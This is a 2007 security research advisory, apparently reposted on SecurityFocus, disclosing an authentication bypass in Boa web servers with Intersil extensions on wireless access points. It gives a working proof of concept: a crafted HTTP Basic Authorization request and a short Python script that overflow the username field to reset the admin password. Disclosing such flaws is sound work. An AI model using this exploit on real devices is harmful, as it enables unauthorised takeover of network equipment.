Boa (with Intersil Extensions) - HTTP Basic Authentication Bypass Sep 13 2007 11:04PM
luca carettoni securenetwork it
Secure Network - Security Research Advisory

Vuln name: HTTP Basic Authentication Bypass
Systems affected: Boa/0.93.15 (with Intersil Extensions) based systems (i.e. FreeLan 802.11g Wireless Access Point (RO80211G-AP))
Severity: High
Local/Remote: Remote
Vendor URL: http://www.boa.org - http://isl3893.sourceforge.net - http://www.roper-europe.com
Author(s): Luca "ikki" Carettoni - luca.carettoni (at) securenetwork (dot) it [email concealed], Claudio "paper" Merloni - claudio.merloni (at) securenetwork (dot) it [email concealed]
Vendor disclosure: 24th August 2007
Vendor acknowledged: -
Vendor patch release: -
Public disclosure: 10th September 2007
Advisory number: SN-2007-02
Advisory URL: http://www.securenetwork.it/advisories/

*** SUMMARY ***

Boa is a single-tasking HTTP server. That means that, unlike traditional web servers, it does not fork for each incoming connection, nor does it fork many copies of itself to handle multiple connections.
Boa is very low on hardware usage and is therefore used on many embedded systems, including routers, wireless access points and portable devices.
The Intersil isl3893 is an arm9 System On Chip for wireless access points. The goal of the project is to make an embedded distribution built around uclibc and uclinux.

It is possible to overwrite the "admin" password in memory, thus allowing an attacker to gain access to the web interface and alter configuration parameters. This vulnerability can be combined with another known vulnerability (CVE-2000-0920) to read arbitrary files from the device filesystem.

It's important to notice that Boa httpd doesn't have any authentication code built in; the flaw is inside the Intersil extensions but we can't confirm it because no source code is released.

*** VULNERABILITY DETAILS ***

When asked for HTTP basic authentication credentials, it is possible to fill up the stack memory of the boa process passing a string longer than 127 characters as username. In that situation the string passed as password will overwrite the current in memory value of the admin password, thus enabling the attacker to reset it to a known value. Once reset the password, the attacker has of course access to the configuration panel.

As an example, the password can be set to "owned" sending the following request to the web server:

GET / HTTP/1.1
Host: 192.168.0.1
Authorization: Basic YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFh
YWFhYWFhYWFhYWFhYWFhYWFhYTpvd25lZA==

The basic authorization header parameter contains the base64/mime encoded string "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:owned"

*** EXPLOIT ***

The vulnerability can exploited through simple HTTP request, i.e. using a common web browser (using the authentication credential specified above).

The following snippet of python code can be used to reproduce the issue:

###### CUT HERE ######

#!/usr/bin/env python
import urllib2

SERVER_IP_ADDRESS = '192.168.0.1'
USERNAME = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
NEW_PASSWORD = 'owned'

auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password('LOGIN(default username & password is admin)', SERVER_IP_ADDRESS, USERNAME, NEW_PASSWORD);
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
res = urllib2.urlopen('http://'+SERVER_IP_ADDRESS+'/home/index.shtml')

###### CUT HERE ######

*** FIX INFORMATION ***

N/A

*** WORKAROUNDS ***

N/A

*********************
*** LEGAL NOTICES ***
*********************

Secure Network (www.securenetwork.it) is an information security company,
which provides consulting and training services, and engages in security
research and development.

We are committed to open, full disclosure of vulnerabilities, cooperating
with software developers for properly handling disclosure issues.

This advisory is copyright © 2007 Secure Network S.r.l. Permission is
hereby granted for the redistribution of this alert, provided that it is
not altered except by reformatting it, and that due credit is given. It
may not be edited in any way without the express consent of Secure Network
S.r.l. Permission is explicitly given for insertion in vulnerability
databases and similars, provided that due credit is given to Secure Network

The information in the advisory is believed to be accurate at the time of
publishing based on currently available information. This information is
provided as-is, as a free service to the community by Secure Network
research staff. There are no warranties with regard to this information.
Secure Network does not accept any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

If you have any comments or inquiries, or any issue with what is reported
in this advisory, please inform us as soon as possible.

E-mail: securenetwork (at) securenetwork (dot) it [email concealed]
GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc
Phone: +39 0363 560 404

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus